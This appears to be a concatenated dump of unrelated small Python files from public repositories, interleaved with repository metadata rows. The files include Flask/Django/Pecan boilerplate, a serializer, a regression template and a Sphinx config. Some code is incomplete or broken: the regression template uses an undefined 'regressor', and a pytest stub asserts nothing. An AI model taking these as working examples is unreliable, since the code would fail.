    """Scraped book record persisted via SQLAlchemy."""
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(40), nullable=False)
    # Slug-style variant of the title used in URLs/routes.
    title_for_route = db.Column(db.String(40), nullable=False)
    price = db.Column(db.String(40), nullable=False)
    # NOTE(review): 40 chars is short for real-world URLs — confirm.
    url = db.Column(db.String(40), nullable=False)

    def __repr__(self):
        return f"{self.id} => {self.title} => {self.price} => {self.url}"
class BookSchema(marshmallow.SQLAlchemySchema):
    """Marshmallow schema serializing Book rows for the API."""
    class Meta:
        model = Book

    id = marshmallow.auto_field()
    title = marshmallow.auto_field()
    title_for_route = marshmallow.auto_field()
    price = marshmallow.auto_field()
    url = marshmallow.auto_field()
| [
"diturra@dparadig.com"
] | diturra@dparadig.com |
a6e84ede469fbe72771be78c555a5612ccf2e137 | 492d3e666b87eff971628a74fe13facde01e2949 | /htmlcov/_python_Django_My Projects_student-portal_Lib_site-packages_ckeditor_uploader_backends___init___py.html.py | 798d55fc791e5536bdf76c670715ec7c0d91fbb8 | [] | no_license | OmarFateh/Student-Portal | 42050da15327aa01944dc79b5e00ca34deb51531 | 167ffd3a4183529c0cbc5db4ab232026711ea915 | refs/heads/master | 2023-06-13T01:03:16.475588 | 2021-07-08T11:09:09 | 2021-07-08T11:09:09 | 382,895,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,201 | py | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX
XXXXX XXXXXXXXXX XXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX
XXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XXX XXXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXX XXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXX XXXXXXXXXXXXXXXXX
XXXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XX XXXXXXXXXXXXXXXXXXXXXXX XX XXXX XXXXXXXX
XXXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXXX XXXXXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXXXXX XXXXXXXXXXX XXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXX XX XXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXX XXXXX XXXXXXXXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XX XXXXXXX X XXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXX
XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXX XXXXXX XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX
XXXXXXX XX XXXXXXXXXX XXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXXXXX
XXXXXXX
| [
"66747309+OmarFateh@users.noreply.github.com"
] | 66747309+OmarFateh@users.noreply.github.com |
255132307851c3be363fe7e4d69e4d88c27f9f08 | 6d8f8850c86f8fb5fa63c8f17370d23125e6cf1e | /setup.py | 556149d26381d6dcda4f84506e4d435555089efa | [] | no_license | luohaixiannz/pecan_test_project | bdf01935b568eb142fb15b1653dabefc539a0937 | b1168f77a4e00a759fb01a7e535071c6897fe1c5 | refs/heads/master | 2020-08-02T22:15:32.286068 | 2019-10-13T07:25:24 | 2019-10-13T07:25:24 | 211,522,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 506 | py | # -*- coding: utf-8 -*-
# Packaging script for the ``pecan_test_project`` Pecan web application.
try:
    from setuptools import setup, find_packages
except ImportError:
    # Legacy bootstrap: fetch/install setuptools via ez_setup, then retry.
    from ez_setup import use_setuptools
    use_setuptools()
    from setuptools import setup, find_packages

setup(
    name='pecan_test_project',
    version='0.1',
    description='',
    author='',
    author_email='',
    # Runtime dependency: the Pecan WSGI framework.
    install_requires=[
        "pecan",
    ],
    test_suite='pecan_test_project',
    zip_safe=False,
    include_package_data=True,
    # Keep the ez_setup bootstrap helper out of the installed distribution.
    packages=find_packages(exclude=['ez_setup'])
)
| [
"root@192.168.0.107"
] | root@192.168.0.107 |
9a2245a65c5409a11353e2bdf4ece15398d0a47e | f080acd0d9f5640124cadd8282c9382df509add4 | /MyPlace/wsgi.py | 7862a3d03fab60f5b815b9e0843ed8a2090652b8 | [] | no_license | MagFry/MyPlace | 69e50367f61ade84d2e34408ec1ec23fe7328593 | 60233a87dc979dff505c4c74b3bb2cb644f9d22d | refs/heads/master | 2020-08-22T07:02:51.358987 | 2019-10-20T10:28:20 | 2019-10-20T10:28:20 | 216,343,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
WSGI config for MyPlace project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings module before the app is constructed
# (setdefault lets an externally provided value win).
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MyPlace.settings')
# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| [
"mfryczka96@gmail.com"
] | mfryczka96@gmail.com |
cec1ac5c978a20fda316ddf1475bffc7cc5c0a85 | b91578b96ffe63639d3efc70d4737b92091cd0b1 | /backend/unpp_api/apps/sanctionslist/serializers.py | 3d57ed5f866b73fbe8dde2953857e5e283fedb35 | [
"Apache-2.0"
] | permissive | unicef/un-partner-portal | 876b6ec394909ed2f72777493623413e9cecbfdc | 73afa193a5f6d626928cae0025c72a17f0ef8f61 | refs/heads/develop | 2023-02-06T21:08:22.037975 | 2019-05-20T07:35:29 | 2019-05-20T07:35:29 | 96,332,233 | 6 | 1 | Apache-2.0 | 2023-01-25T23:21:41 | 2017-07-05T15:07:44 | JavaScript | UTF-8 | Python | false | false | 633 | py | from rest_framework import serializers
from sanctionslist.models import SanctionedNameMatch
class SanctionedNameMatchSerializer(serializers.ModelSerializer):
sanctioned_type = serializers.CharField(source='name.item.sanctioned_type', read_only=True)
sanctioned_type_display = serializers.CharField(source='name.item.get_sanctioned_type_display', read_only=True)
match_type_display = serializers.CharField(source='get_match_type_display', read_only=True)
class Meta:
model = SanctionedNameMatch
exclude = (
'partner',
'can_ignore',
'can_ignore_text',
)
| [
"maciej.jaworski@tivix.com"
] | maciej.jaworski@tivix.com |
6d7a90d3a937dd973e04b37a56190fc593aaaff0 | 45df32d998f8edf8ea3929b939c8b81a48eae6cf | /vegify/read_csv_test.py | 1e6bce0e7a4d78ce34e7c9748bf87de49bed9a80 | [] | no_license | FriedBender/shiny-pancake | 086654daddec42d57c7b984b2e1be65d05135f7e | 54a14d19510482662d833a8a5772295e5f426c9d | refs/heads/master | 2023-05-06T19:10:18.420770 | 2021-05-19T20:12:35 | 2021-05-19T20:12:35 | 367,722,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | import pytest
from . import read_csv
import csv
# These are local to FriedBenders file structure, modify them as needed
location_of_skus = '/home/maksim/Documents/School/CS 469 - Capstone I/playground/Vegify/itemSKUs.csv'
location_of_Menu_Alternatives = '/home/maksim/Documents/School/CS 469 - Capstone I/playground/Vegify/MenuItemAlternatives.csv'
location_of_Menu_Item_Ingrediants = '/home/maksim/Documents/School/CS 469 - Capstone I/playground/Vegify/menuItemIngrediants.csv'
class TestCsv:
def test_open_read_csv_file(self):
opened_file = open(location_of_skus, 'r', newline='')
test_header = next(opened_file)
csv_file = opened_file
| [
"maxsemchuk@icloud.com"
] | maxsemchuk@icloud.com |
2b5406445f055b8f76f085481dde082f1634c1ff | fe8c038452ff1067693d7b0e61f7004d15b0f791 | /01-Crash Course/week-03/02-Foor_loop/quiz_for-loop_factorial.py | eb425075bb00b8fd8a307b8572f775ff1713c858 | [] | no_license | varunjha089/Google-IT-Automation-with-Python | 73fec6a6a3348d4a5039dd78fa26eb1509b37db0 | 3eb176a989244ead534d194101d7f2da7a2a00ab | refs/heads/master | 2022-11-23T22:17:13.814889 | 2020-08-02T04:38:51 | 2020-08-02T04:38:51 | 273,307,102 | 0 | 0 | null | 2020-07-05T12:00:18 | 2020-06-18T18:04:26 | Python | UTF-8 | Python | false | false | 161 | py | def factorial(n):
result = 1
for x in range(1, n):
result = result * x
return result
for n in range(0, 10):
print(n, factorial(n + 1))
| [
"varunjha089@gmail.com"
] | varunjha089@gmail.com |
9ef5e5fee2e79e57e5166dc15c07384e10dad3c5 | ff8c52894b957eec143f56a6c5b6c331c2d5a6a1 | /4 - Polynomial Regression/Python/regressor_template.py | 798003c20c33cc9fa5838a723ca3423b53f98d8e | [] | no_license | thimontenegro/Machine-Learning | c9dd2165f6d9d55927b8d22ae2146cb67177ac67 | 33bcab62d6523fe7c4d7f760854df25eccb1420c | refs/heads/master | 2020-04-25T15:51:21.327587 | 2020-02-25T18:49:39 | 2020-02-25T18:49:39 | 172,891,102 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,869 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 13 00:17:31 2019
@author: Thiago Montenegro
"""
#Regressor Template
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
#Importing the dataset
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:, 1:2].values
Y = dataset.iloc[:, 2].values
#Spliotting the dataset into the Training set and Test Set
"""
from sklearn.model_selection import train_test_split
X_train,X_test,Y_train,Y_test = train_test_split(X,y, test_size = 0.2, random_state = 0)
"""
#Feature Scaling
"""
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)
"""
#Fitting the Regression Model to the dataset
#create your regressor here
#Comparing Linear Regression vs Polynomial Regression
from sklearn.linear_model import LinearRegression
#Fitting the Regression Model to the dataset
linear_regressor = LinearRegression()
#Predicting a new Result with Linear Regression
#Predicting a new Result with Polynomial Regression
y_pred = regressor.predict([[6.5]])
#Visualising the Regression Results
plt.scatter(X,Y, color = 'blue')
plt.plot(X,regressor.predict(X), color = 'black')
plt.xlabel("Position Levels")
plt.ylabel('Salary')
plt.title('Truth or Bluff (Regression Model)')
plt.show()
#Visualising the Regression results(fir higher resolution and smoother curve)
X_grid = np.arange(min(X), max(X), 0.1)
X_grid = X_grid.reshape((len(X_grid),1))
#Visualising the Polynomial Regression Results
plt.scatter(X,Y, color = 'blue')
plt.plot(X_grid,regressor.predict(X_grid), color = 'black')
plt.xlabel("Position Levels")
plt.ylabel('Salary')
plt.title('Truth or Bluff (Regression Model)')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
5af1652e71e6675f99c875dcb9695b1034b4e964 | abb8e5cf8c7ff330e424490f1425b3dfa1318910 | /docs/conf.py | 0e1815215051fbe6692ee04d654a566f82e98baa | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | fonclub/instagram_private_api | 94e887700d934eae2eece8a3623d9b28502c2c57 | fe29b092f591a059502ec070dfc4ba4113c34e43 | refs/heads/master | 2021-01-11T13:44:24.646424 | 2017-06-22T04:24:06 | 2017-06-22T04:24:06 | 95,124,093 | 1 | 0 | null | 2017-06-22T14:27:48 | 2017-06-22T14:27:47 | null | UTF-8 | Python | false | false | 4,962 | py | # -*- coding: utf-8 -*-
#
# instagram_private_api documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 13 15:42:33 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# import instagram_private_api
# import instagram_web_api
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'instagram_private_api'
copyright = u'2017, ping'
author = u'ping'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.3.4'
# The full version, including alpha/beta/rc tags.
# NOTE: `version` and `release` duplicate the same literal; bump both
# together (or derive one from the package metadata) when releasing.
release = u'1.3.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
